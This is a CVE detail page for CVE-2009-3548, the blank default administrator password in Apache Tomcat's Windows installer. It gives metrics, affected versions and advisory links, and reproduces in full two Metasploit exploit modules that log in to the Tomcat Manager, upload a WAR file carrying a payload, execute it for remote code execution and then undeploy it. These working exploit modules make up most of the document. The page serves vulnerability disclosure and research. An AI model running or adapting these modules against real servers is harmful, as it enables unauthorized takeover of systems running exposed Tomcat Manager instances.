CVE-2009-3548 : Detail

CVE-2009-3548

A07-Identif. and Authent. Fail
24.09%V3
Network
2009-11-12 22h00 +00:00
2020-02-13 15h08 +00:00

CVE Description

The Windows installer for Apache Tomcat 6.0.0 through 6.0.20, 5.5.0 through 5.5.28, and possibly earlier versions uses a blank default password for the administrative user, which allows remote attackers to gain privileges.

CVE Information

Related Weaknesses

CWE-ID: CWE-255
Weakness Name: Category: Credentials Management Errors
Weaknesses in this category are related to the management of credentials.

Metrics

CVSS V2 score: 7.5
CVSS V2 vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0% to 100%). The higher the score, the greater the probability that the vulnerability will be exploited.

EPSS Percentile

The percentile ranks CVEs by their EPSS score. For example, a CVE in the 95th percentile is more likely to be exploited than 95% of all other CVEs, so the percentile is what allows one CVE's EPSS score to be compared with the scores of other CVEs.

Exploit information

Exploit Database EDB-ID : 16317

Publication date : 2010-12-13 23h00 +00:00
Author : Metasploit
EDB Verified : Yes

##
# $Id: tomcat_mgr_deploy.rb 11330 2010-12-14 17:26:44Z egypt $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)/ ] }

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Apache Tomcat Manager Application Deployer Authenticated Code Execution',
      'Description'    => %q{
        This module can be used to execute a payload on Apache Tomcat servers that
        have an exposed "manager" application. The payload is uploaded as a WAR archive
        containing a jsp application using a PUT request.

        The manager application can also be abused using /manager/html/upload, but that
        method is not implemented in this module.
      },
      'Author'         => [ 'jduck' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 11330 $',
      'References'     =>
        [
          # There is no single vulnerability associated with deployment functionality.
          # Instead, the focus has been on insecure/blank/hardcoded default passwords.

          # The following references refer to HP Operations Manager
          [ 'CVE', '2009-3843' ],
          [ 'OSVDB', '60317' ],
          [ 'CVE', '2009-4189' ],
          [ 'OSVDB', '60670' ],
          # HP Operations Dashboard
          [ 'CVE', '2009-4188' ],
          # IBM Cognos Express Default user/pass
          [ 'BID', '38084' ],
          [ 'CVE', '2010-0557' ],
          [ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21419179' ],
          # IBM Rational Quality Manager and Test Lab Manager
          [ 'CVE', '2010-4094' ],
          [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-214/' ],
          # 'admin' password is blank in default Windows installer
          [ 'CVE', '2009-3548' ],
          [ 'OSVDB', '60176' ],
          [ 'BID', '36954' ],
          # tomcat docs
          [ 'URL', 'http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html' ]
        ],
      'Platform'       => [ 'java', 'win', 'linux' ], # others?
      'Targets'        =>
        [
          #
          # detect via /manager/serverinfo
          #
          [ 'Automatic', { } ],
          [ 'Java Universal',
            {
              'Arch'     => ARCH_JAVA,
              'Platform' => 'java'
            },
          ],

          #
          # Platform specific targets only
          #
          [ 'Windows Universal',
            {
              'Arch'     => ARCH_X86,
              'Platform' => 'win'
            },
          ],
          [ 'Linux x86',
            {
              'Arch'     => ARCH_X86,
              'Platform' => 'linux'
            },
          ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Nov 09 2009'))

    register_options(
      [
        OptBool.new('VERBOSE',    [ false, 'Enable verbose output', false ]),
        OptString.new('USERNAME', [ false, 'The username to authenticate as' ]),
        OptString.new('PASSWORD', [ false, 'The password for the specified username' ]),
        # /cognos_express/manager/ for Cognos Express (19300)
        OptString.new('PATH',     [ true, "The URI path of the manager app (/deploy and /undeploy will be used)", '/manager'])
      ], self.class)
  end

  def auto_target
    print_status("Attempting to automatically select a target...")

    res = query_serverinfo()
    return nil if not res

    plat = detect_platform(res.body)
    arch = detect_arch(res.body)

    # No arch or platform found?
    if (not arch or not plat)
      return nil
    end

    # see if we have a match
    targets.each { |t|
      if (t['Platform'] == plat) and (t['Arch'] == arch)
        return t
      end
    }

    # no matching target found
    return nil
  end

  def exploit
    datastore['BasicAuthUser'] = datastore['USERNAME']
    datastore['BasicAuthPass'] = datastore['PASSWORD']

    mytarget = target
    if (target.name =~ /Automatic/)
      mytarget = auto_target
      if (not mytarget)
        raise RuntimeError, "Unable to automatically select a target"
      end
      print_status("Automatically selected target \"#{mytarget.name}\"")
    else
      print_status("Using manually selected target \"#{mytarget.name}\"")
    end

    # We must regenerate the payload in case our auto-magic changed something.
    p = exploit_regenerate_payload(mytarget.platform, mytarget.arch)

    # Generate the WAR containing the EXE containing the payload
    jsp_name = rand_text_alphanumeric(4 + rand(32 - 4))
    app_base = rand_text_alphanumeric(4 + rand(32 - 4))

    # Generate the WAR containing the payload
    war = p.encoded_war({
      :app_name => app_base,
      :jsp_name => jsp_name,
      :arch     => mytarget.arch,
      :platform => mytarget.platform
    }).to_s

    query_str = "?path=/" + app_base

    #
    # UPLOAD
    #
    path_tmp = datastore['PATH'] + "/deploy" + query_str
    print_status("Uploading #{war.length} bytes as #{app_base}.war ...")
    res = send_request_cgi({
      'uri'    => path_tmp,
      'method' => 'PUT',
      'ctype'  => 'application/octet-stream',
      'data'   => war,
    }, 20)
    if (! res)
      raise RuntimeError, "Upload failed on #{path_tmp} [No Response]"
    end
    if (res.code < 200 or res.code >= 300)
      case res.code
      when 401
        print_error("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}")
      end
      raise RuntimeError, "Upload failed on #{path_tmp} [#{res.code} #{res.message}]"
    end

    #
    # EXECUTE
    #
    jsp_path = '/' + app_base + '/' + jsp_name + '.jsp'
    print_status("Executing #{jsp_path}...")
    res = send_request_cgi({
      'uri'    => jsp_path,
      'method' => 'GET'
    }, 20)
    if (! res)
      print_error("Execution failed on #{app_base} [No Response]")
    elsif (res.code < 200 or res.code >= 300)
      print_error("Execution failed on #{app_base} [#{res.code} #{res.message}]")
      print_status(res.body) if datastore['VERBOSE']
    end

    #
    # DELETE
    #
    path_tmp = datastore['PATH'] + "/undeploy" + query_str
    print_status("Undeploying #{app_base} ...")
    res = send_request_cgi({
      'uri'    => path_tmp,
      'method' => 'GET'
    }, 20)
    # The error messages below report path_tmp; the original interpolated an
    # undefined local 'path' here, which would raise NameError on the failure path.
    if (! res)
      print_error("WARNING: Undeployment failed on #{path_tmp} [No Response]")
    elsif (res.code < 200 or res.code >= 300)
      print_error("Deletion failed on #{path_tmp} [#{res.code} #{res.message}]")
    end

    handler
  end

  def query_serverinfo()
    path = datastore['PATH'] + '/serverinfo'
    res = send_request_raw(
      {
        'uri' => path
      }, 10)

    if (not res) or (res.code != 200)
      print_error("Failed: Error requesting #{path}")
      return nil
    end

    print_status(res.body) if datastore['VERBOSE']

    return res
  end

  def detect_platform(body = nil)
    if not body
      res = query_serverinfo()
      return nil if not res
      body = res.body
    end

    body.each_line { |ln|
      ln.chomp!
      case ln
      when /OS Name: /
        os = ln.split(':')[1]
        case os
        when /Windows/
          return 'win'
        when /Linux/
          return 'linux'
        end
      end
    }
  end

  def detect_arch(body)
    body.each_line { |ln|
      ln.chomp!
      case ln
      when /OS Architecture: /
        ar = ln.split(':')[1].strip
        case ar
        when 'x86', 'i386', 'i686'
          return ARCH_X86
        when 'x86_64', 'amd64'
          return ARCH_X86
        end
      end
    }
  end

end
Exploit Database EDB-ID : 31433

Publication date : 2014-02-04 23h00 +00:00
Author : Metasploit
EDB Verified : Yes

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)/ ] }

  CSRF_VAR = 'CSRF_NONCE='

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Apache Tomcat Manager Application Upload Authenticated Code Execution',
      'Description'    => %q{
        This module can be used to execute a payload on Apache Tomcat servers that
        have an exposed "manager" application. The payload is uploaded as a WAR archive
        containing a jsp application using a POST request against the /manager/html/upload
        component.

        NOTE: The compatible payload sets vary based on the selected target. For
        example, you must select the Windows target to use native Windows payloads.
      },
      'Author'         => 'rangercha',
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          # This is based on jduck's tomcat_mgr_deploy.
          # tomcat_mgr_deploy no longer works for current versions of tomcat due to
          # CSRF protection tokens. Also PUT requests against the /manager/html/deploy
          # aren't allowed anymore.

          # There is no single vulnerability associated with deployment functionality.
          # Instead, the focus has been on insecure/blank/hardcoded default passwords.

          # The following references refer to HP Operations Manager
          ['CVE', '2009-3843'],
          ['OSVDB', '60317'],
          ['CVE', '2009-4189'],
          ['OSVDB', '60670'],
          # HP Operations Dashboard
          ['CVE', '2009-4188'],
          # IBM Cognos Express Default user/pass
          ['BID', '38084'],
          ['CVE', '2010-0557'],
          ['URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21419179'],
          # IBM Rational Quality Manager and Test Lab Manager
          ['CVE', '2010-4094'],
          ['ZDI', '10-214'],
          # 'admin' password is blank in default Windows installer
          ['CVE', '2009-3548'],
          ['OSVDB', '60176'],
          ['BID', '36954'],
          # tomcat docs
          ['URL', 'http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html']
        ],
      'Platform'       => %w{ java linux win }, # others?
      'Targets'        =>
        [
          [ 'Java Universal',
            {
              'Arch'     => ARCH_JAVA,
              'Platform' => 'java'
            }
          ],

          #
          # Platform specific targets only
          #
          [ 'Windows Universal',
            {
              'Arch'     => ARCH_X86,
              'Platform' => 'win'
            }
          ],
          [ 'Linux x86',
            {
              'Arch'     => ARCH_X86,
              'Platform' => 'linux'
            }
          ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Nov 09 2009'))

    register_options(
      [
        OptString.new('USERNAME', [false, 'The username to authenticate as']),
        OptString.new('PASSWORD', [false, 'The password for the specified username']),
        # /cognos_express/manager/ for Cognos Express (19300)
        OptString.new('TARGETURI', [true, "The URI path of the manager app (/html/upload and /undeploy will be used)", '/manager'])
      ], self.class)
  end

  def check
    res = query_manager
    disconnect

    return CheckCode::Unknown if res.nil?

    if res.code.between?(400, 499)
      vprint_error("#{peer} - Server rejected the credentials")
      return CheckCode::Unknown
    end

    return CheckCode::Safe unless res.code == 200

    # if res.code == 200
    # there should be access to the Tomcat Manager and to the status page
    res = query_status
    return CheckCode::Unknown unless res

    plat = detect_platform(res.body)
    arch = detect_arch(res.body)

    return CheckCode::Unknown unless plat and arch

    vprint_status("#{peer} - Tomcat Manager found running on #{plat} platform and #{arch} architecture")

    # This module registers TARGETURI (not PATH), so the proof string reports
    # target_uri.path; the original read the unset datastore['PATH'].
    report_auth_info(
      :host   => rhost,
      :port   => rport,
      :sname  => (ssl ? "https" : "http"),
      :user   => datastore['USERNAME'],
      :pass   => datastore['PASSWORD'],
      :proof  => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{target_uri.path}",
      :active => true
    )

    return CheckCode::Appears
  end

  def exploit
    @app_base = rand_text_alphanumeric(4 + rand(32 - 4))
    @jsp_name = rand_text_alphanumeric(4 + rand(32 - 4))

    #
    # Find the session ID and the CSRF token
    #
    print_status("#{peer} - Retrieving session ID and CSRF token...")
    unless access_manager?
      fail_with(Failure::Unknown, "Unable to access the Tomcat Manager")
    end

    #
    # Upload Payload
    #
    print_status("#{peer} - Uploading and deploying #{@app_base}...")
    if upload_payload
      report_auth_info(
        :host   => rhost,
        :port   => rport,
        :sname  => (ssl ? "https" : "http"),
        :user   => datastore['USERNAME'],
        :pass   => datastore['PASSWORD'],
        :proof  => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{target_uri.path}",
        :active => true
      )
    else
      fail_with(Failure::Unknown, "Upload failed")
    end

    #
    # Execute Payload
    #
    print_status("#{peer} - Executing #{@app_base}...")
    unless execute_payload
      fail_with(Failure::Unknown, "Failed to execute the payload")
    end

    #
    # Get the new CSRF token & session id
    #
    unless access_manager?
      fail_with(Failure::Unknown, "Unable to access the Tomcat Manager")
    end

    #
    # Delete the deployed payload
    #
    print_status("#{peer} - Undeploying #{@app_base} ...")
    unless undeploy_app
      print_warning("#{peer} - Failed to undeploy #{@app_base}...")
    end
  end

  def query_status
    path = normalize_uri(target_uri.path.to_s, 'status')
    res = send_request_raw('uri' => path)

    unless res and res.code == 200
      vprint_error("Failed: Error requesting #{path}")
      return nil
    end

    return res
  end

  def query_manager
    path = normalize_uri(target_uri.path.to_s, '/html')
    res = send_request_raw('uri' => path)
    return res
  end

  def vars_get
    vars = {}
    unless @csrf_token.nil?
      vars = {
        "path" => @app_base,
        "org.apache.catalina.filters.CSRF_NONCE" => @csrf_token
      }
    end
    return vars
  end

  def detect_platform(body)
    return nil if body.blank?

    i = 0
    body.each_line do |ln|
      ln.chomp!
      i = 1 if ln =~ /OS Name/
      if i == 9 or i == 11
        if ln.include? "Windows"
          return 'win'
        elsif ln.include? "Linux"
          return 'linux'
        elsif i == 11
          return 'unknown'
        end
      end
      i = i + 1 if i > 0
    end
  end

  def detect_arch(body)
    return nil if body.blank?

    i = 0
    body.each_line do |ln|
      ln.chomp!
      i = 1 if ln =~ /OS Architecture/
      if i == 9 or i == 11
        if ln.include? 'x86'
          return ARCH_X86
        elsif ln.include? 'i386'
          return ARCH_X86
        elsif ln.include? 'i686'
          return ARCH_X86
        elsif ln.include? 'x86_64'
          return ARCH_X86
        elsif ln.include? 'amd64'
          return ARCH_X86
        elsif i == 11
          return 'unknown'
        end
      end
      i = i + 1 if i > 0
    end
  end

  def find_csrf(res = nil)
    return "" if res.blank?

    vprint_status("#{peer} - Finding CSRF token...")
    body = res.body
    body.each_line do |ln|
      ln.chomp!
      csrf_nonce = ln.index(CSRF_VAR)
      next if csrf_nonce.nil?
      token = ln[csrf_nonce + CSRF_VAR.length, 32]
      return token
    end

    return ""
  end

  def generate_multipart_msg(boundary, data)
    # Rex::MIME::Message is breaking the binary upload when trying to
    # enforce CRLF for SMTP compatibility
    war_multipart = "-----------------------------"
    war_multipart << boundary
    war_multipart << "\r\nContent-Disposition: form-data; name=\"deployWar\"; filename=\""
    war_multipart << @app_base
    war_multipart << ".war\"\r\nContent-Type: application/octet-stream\r\n\r\n"
    war_multipart << data
    war_multipart << "\r\n-----------------------------"
    war_multipart << boundary
    war_multipart << "--\r\n"
  end

  def war_payload
    payload.encoded_war({
      :app_name => @app_base,
      :jsp_name => @jsp_name,
      :arch     => target.arch,
      :platform => target.platform
    }).to_s
  end

  def send_war_payload(url, war)
    boundary_identifier = rand_text_numeric(28)

    res = send_request_cgi({
      'uri'      => url,
      'method'   => 'POST',
      'ctype'    => 'multipart/form-data; boundary=---------------------------' + boundary_identifier,
      'user'     => datastore['USERNAME'],
      'password' => datastore['PASSWORD'],
      'cookie'   => @session_id,
      'vars_get' => vars_get,
      'data'     => generate_multipart_msg(boundary_identifier, war),
    })

    return res
  end

  def send_request_undeploy(url)
    res = send_request_cgi({
      'uri'      => url,
      'vars_get' => vars_get,
      'method'   => 'POST',
      'user'     => datastore['USERNAME'],
      'password' => datastore['PASSWORD'],
      'cookie'   => @session_id
    })

    return res
  end

  def access_manager?
    res = query_manager
    return false unless res and res.code == 200

    @session_id = res.get_cookies
    @csrf_token = find_csrf(res)

    return true
  end

  def upload_payload
    war = war_payload
    upload_path = normalize_uri(target_uri.path.to_s, "html", "upload")

    vprint_status("#{peer} - Uploading #{war.length} bytes as #{@app_base}.war ...")
    res = send_war_payload(upload_path, war)

    return parse_upload_response(res, upload_path)
  end

  # upload_path is passed in explicitly; the original referenced it here as a
  # local that only existed inside upload_payload.
  def parse_upload_response(res, upload_path)
    unless res
      vprint_error("#{peer} - Upload failed on #{upload_path} [No Response]")
      return false
    end

    if res.code < 200 or res.code >= 300
      vprint_warning("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}") if res.code == 401
      vprint_error("Upload failed on #{upload_path} [#{res.code} #{res.message}]")
      return false
    end

    return true
  end

  def execute_payload
    jsp_path = normalize_uri(@app_base, "#{@jsp_name}.jsp")

    vprint_status("#{peer} - Executing #{jsp_path}...")
    res = send_request_cgi({
      'uri'    => jsp_path,
      'method' => 'GET'
    })

    return parse_execute_response(res)
  end

  def parse_execute_response(res)
    unless res
      vprint_error("#{peer} - Execution failed on #{@app_base} [No Response]")
      return false
    end

    if res and (res.code < 200 or res.code >= 300)
      vprint_error("#{peer} - Execution failed on #{@app_base} [#{res.code} #{res.message}]")
      return false
    end

    return true
  end

  def undeploy_app
    undeploy_url = normalize_uri(target_uri.path.to_s, "html", "undeploy")

    res = send_request_undeploy(undeploy_url)

    unless res
      vprint_warning("#{peer} - WARNING: Undeployment failed on #{undeploy_url} [No Response]")
      return false
    end

    if res and (res.code < 200 or res.code >= 300)
      vprint_warning("#{peer} - Deletion failed on #{undeploy_url} [#{res.code} #{res.message}]")
      return false
    end

    return true
  end

end

Products Mentioned

Configuration 0

Apache >> Tomcat, affected versions:

3.x: 3.0, 3.1, 3.1.1, 3.2, 3.2.1, 3.2.2, 3.2.3, 3.2.4, 3.3, 3.3.1, 3.3.1a, 3.3.2

4.0.x: 4.0.0, 4.0.1, 4.0.2, 4.0.3, 4.0.4, 4.0.5, 4.0.6

4.1.x: 4.1.0, 4.1.1, 4.1.2, 4.1.3, 4.1.4, 4.1.5, 4.1.6, 4.1.7, 4.1.8, 4.1.9, 4.1.10, 4.1.11, 4.1.12, 4.1.13, 4.1.14, 4.1.15, 4.1.16, 4.1.17, 4.1.18, 4.1.19, 4.1.20, 4.1.21, 4.1.22, 4.1.23, 4.1.24, 4.1.25, 4.1.26, 4.1.27, 4.1.28, 4.1.29, 4.1.30, 4.1.31, 4.1.32, 4.1.33, 4.1.34, 4.1.35, 4.1.36, 4.1.37, 4.1.38, 4.1.39

5.0.x: 5.0.0, 5.0.1, 5.0.2, 5.0.3, 5.0.4, 5.0.5, 5.0.6, 5.0.7, 5.0.8, 5.0.9, 5.0.10, 5.0.11, 5.0.12, 5.0.13, 5.0.14, 5.0.15, 5.0.16, 5.0.17, 5.0.18, 5.0.19, 5.0.21, 5.0.22, 5.0.23, 5.0.24, 5.0.25, 5.0.26, 5.0.27, 5.0.28, 5.0.29, 5.0.30

5.5.x: 5.5.0, 5.5.1, 5.5.2, 5.5.3, 5.5.4, 5.5.5, 5.5.6, 5.5.7, 5.5.8, 5.5.9, 5.5.10, 5.5.11, 5.5.12, 5.5.13, 5.5.14, 5.5.15, 5.5.16, 5.5.17, 5.5.18, 5.5.19, 5.5.20, 5.5.21, 5.5.22, 5.5.23, 5.5.24, 5.5.25, 5.5.26, 5.5.27, 5.5.28

6.0.x: 6.0, 6.0.0, 6.0.1, 6.0.2, 6.0.3, 6.0.4, 6.0.5, 6.0.6, 6.0.7, 6.0.8, 6.0.9, 6.0.10, 6.0.11, 6.0.12, 6.0.13, 6.0.14, 6.0.15, 6.0.16, 6.0.17, 6.0.18, 6.0.20

References

http://marc.info/?l=bugtraq&m=127420533226623&w=2
Tags : vendor-advisory, x_refsource_HP
http://marc.info/?l=bugtraq&m=136485229118404&w=2
Tags : vendor-advisory, x_refsource_HP
http://secunia.com/advisories/40330
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.vupen.com/english/advisories/2010/1559
Tags : vdb-entry, x_refsource_VUPEN
http://marc.info/?l=bugtraq&m=133469267822771&w=2
Tags : vendor-advisory, x_refsource_HP
http://secunia.com/advisories/57126
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.securityfocus.com/bid/36954
Tags : vdb-entry, x_refsource_BID
http://www.vupen.com/english/advisories/2009/3185
Tags : vdb-entry, x_refsource_VUPEN
http://marc.info/?l=bugtraq&m=139344343412337&w=2
Tags : vendor-advisory, x_refsource_HP
http://www.securitytracker.com/id?1023146
Tags : vdb-entry, x_refsource_SECTRACK